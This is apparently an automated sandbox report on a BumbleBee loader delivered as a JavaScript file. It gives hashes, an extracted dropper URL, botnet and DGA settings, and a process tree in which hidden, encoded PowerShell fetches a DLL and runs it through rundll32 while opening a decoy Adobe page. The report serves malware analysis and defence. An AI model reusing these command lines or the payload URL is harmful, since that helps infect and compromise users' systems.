Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • submitted
    22-10-2024 21:04

General

  • Target

    Report_1eed5c99-5474-4156-a3c8-a5537ffea449.js

  • Size

    42KB

  • MD5

    c77a5b4849df9ec7bdcdf970504c6bf5

  • SHA1

    cea1a6eff08bf3c54eb889af265b0f62f6897cf9

  • SHA256

    3df813c5990e6bf7a841b1ecac9e224903e37a3f8e32d63b9816c3507aab5637

  • SHA512

    a24a3ca285cd942f1170f75ceb23a97c441cf7694b53af8e5c1c880e5ff6bbddde50f78e28a97785276998b5c7646ffccb34d5e2d0f13fe8a85acaa80f8bf98e

  • SSDEEP

    768:2/OWgWxiLG0nMLTYFFd4SCEA4iuxbSHsH0G4SCS64TN+n6AmiY7BTER/Xzb1ql83:zBgR/Xzb1qblhoooLCk+TBUVDiwQ+pa2

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://mycocojamboo.com/bgfhfg/lGmEQCgpfT.dll

Extracted

Family

bumblebee

Botnet

lnk001

Attributes
  • dga

  • dga_seed

    1016365528594956469

  • domain_length

    11

  • num_dga_domains

    100

  • port

    443

rc4.plain

Signatures

  • BumbleBee

    BumbleBee is a loader malware written in C++.

  • Bumblebee family
  • Blocklisted process makes network request 19 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell with its display window hidden.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Report_1eed5c99-5474-4156-a3c8-a5537ffea449.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -w hidden -EncodedCommand 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
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3260
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -EncodedCommand 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
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2428
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\sDkpD3I8\dllfile.dll,DllRegisterServer
          4⤵
          • Blocklisted process makes network request
          PID:1556
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -C "start https://helpx.adobe.com/uk/acrobat/kb/install-updates-reader-acrobat.html"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3168
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://helpx.adobe.com/uk/acrobat/kb/install-updates-reader-acrobat.html
        3⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1968
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd630d46f8,0x7ffd630d4708,0x7ffd630d4718
          4⤵
            PID:1668
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
            4⤵
              PID:1264
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2784
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:8
              4⤵
                PID:1160
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                4⤵
                  PID:1888
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
                  4⤵
                    PID:3144
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
                    4⤵
                      PID:4716
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3432
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
                      4⤵
                        PID:2844
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
                        4⤵
                          PID:380
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
                          4⤵
                            PID:4136
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
                            4⤵
                              PID:1888
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1296 /prefetch:2
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5856
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:1568
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:2016

Network

MITRE ATT&CK Enterprise v15

Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                            Filesize

                            3KB

                            MD5

                            61e2e57471d559f5f6813c0a7995c075

                            SHA1

                            33c621541bc0892ddab1b65345a348c14af566e5

                            SHA256

                            c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d

                            SHA512

                            9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                            Filesize

                            152B

                            MD5

                            443a627d539ca4eab732bad0cbe7332b

                            SHA1

                            86b18b906a1acd2a22f4b2c78ac3564c394a9569

                            SHA256

                            1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

                            SHA512

                            923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                            Filesize

                            152B

                            MD5

                            99afa4934d1e3c56bbce114b356e8a99

                            SHA1

                            3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

                            SHA256

                            08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

                            SHA512

                            76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                            Filesize

                            816B

                            MD5

                            575cfcde7332b11b500f391131e6291f

                            SHA1

                            4bb949b996fa76f829c23b4114c65c324102fcf6

                            SHA256

                            b30076e49c143f95700e9da694ea40c102df21fa393e127fb836d4320517bdfb

                            SHA512

                            d699339cdef3e82a80db847af71310c3fa92ed1a11b5ef9aa933ce90f9afbbedd39bc38c005b746fe2b8d4a4749852a7703e7c0bc90a513040299429805a87fd

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                            Filesize

                            1KB

                            MD5

                            550891bb3b717c0748b16cefdc3421fe

                            SHA1

                            0272e629a990d8d0343f39f3f265c07ea242470b

                            SHA256

                            c4b2c630fc4fc8b2e3f0e1142e060d63a4e32d419491be3cb078ee37499792f6

                            SHA512

                            3f6c6a9695ec9e3f0159d974b6f60eb5f03a380cca297c7c82996652876c8b47b75504b4103f06cae1d2e354648b86128d7767122196f4e399a2c05981df4305

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                            Filesize

                            5KB

                            MD5

                            e4739b2bbbade2508a6d1d6235776bb2

                            SHA1

                            08da2d7cc4ab2163928bc31569eab10c9d1fbd23

                            SHA256

                            ef9f813c03f8a1c6b085c98230af1fd5d65866e4c87b936600f99e82859dbd20

                            SHA512

                            376881b542196fd0d16d3c5672bbb96cd302215010e3a67ec5c0057fb0d30654f6d804672efdd52c3933549225328a2d68428912547100fe4d1451234589e80f

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                            Filesize

                            6KB

                            MD5

                            fb3394b1af2dce5e03e8175286b95a64

                            SHA1

                            d56918d16d33edd1a273ccad48b4239ff2cc0400

                            SHA256

                            c892f2136114ee571094f06e9d960faafd6a1b880087196898ad662f98658201

                            SHA512

                            c6213b152e130e58003b4b341a18c41d42b52df13946aa2ce5ff5131237d8d7a8e0d08a36b3b83d2a1cfc44f5435e142eb3394033b21ef8296469bcf840c7b1f

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                            Filesize

                            16B

                            MD5

                            46295cac801e5d4857d09837238a6394

                            SHA1

                            44e0fa1b517dbf802b18faf0785eeea6ac51594b

                            SHA256

                            0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                            SHA512

                            8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                            Filesize

                            16B

                            MD5

                            206702161f94c5cd39fadd03f4014d98

                            SHA1

                            bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                            SHA256

                            1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                            SHA512

                            0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                            Filesize

                            11KB

                            MD5

                            682fea592a0fafacc67b6fd2b4a2f17e

                            SHA1

                            eeb7ac914c991b3cbc59625577c62cf98f22ff6e

                            SHA256

                            f00c1ee32fd4add83b6ef036eb2af0014fd817d64e26f3528452abf790c28ef9

                            SHA512

                            f07bac059e5efa11a780101d32b19d46989bdcfc29ae0ebcaf70d6eefc9cafa60fc73e7779858c30d9050bbdf6784e1d9eecf357951a3e783b76d2db9e334d6c

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            64B

                            MD5

                            3ca1082427d7b2cd417d7c0b7fd95e4e

                            SHA1

                            b0482ff5b58ffff4f5242d77330b064190f269d3

                            SHA256

                            31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

                            SHA512

                            bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k0a1yldi.fr4.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • memory/1556-32-0x0000017D68F30000-0x0000017D69149000-memory.dmp

                            Filesize

                            2.1MB

                          • memory/1556-33-0x0000017D68F30000-0x0000017D69149000-memory.dmp

                            Filesize

                            2.1MB

                          • memory/1556-31-0x0000017D68F30000-0x0000017D69149000-memory.dmp

                            Filesize

                            2.1MB

                          • memory/2428-23-0x000001ADF8600000-0x000001ADF8614000-memory.dmp

                            Filesize

                            80KB

                          • memory/2428-22-0x000001ADF8380000-0x000001ADF83A6000-memory.dmp

                            Filesize

                            152KB

                          • memory/3260-0-0x00007FFD6D403000-0x00007FFD6D405000-memory.dmp

                            Filesize

                            8KB

                          • memory/3260-30-0x00007FFD6D400000-0x00007FFD6DEC1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3260-24-0x00007FFD6D403000-0x00007FFD6D405000-memory.dmp

                            Filesize

                            8KB

                          • memory/3260-12-0x00007FFD6D400000-0x00007FFD6DEC1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3260-11-0x00007FFD6D400000-0x00007FFD6DEC1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3260-1-0x000002BDF9620000-0x000002BDF9642000-memory.dmp

                            Filesize

                            136KB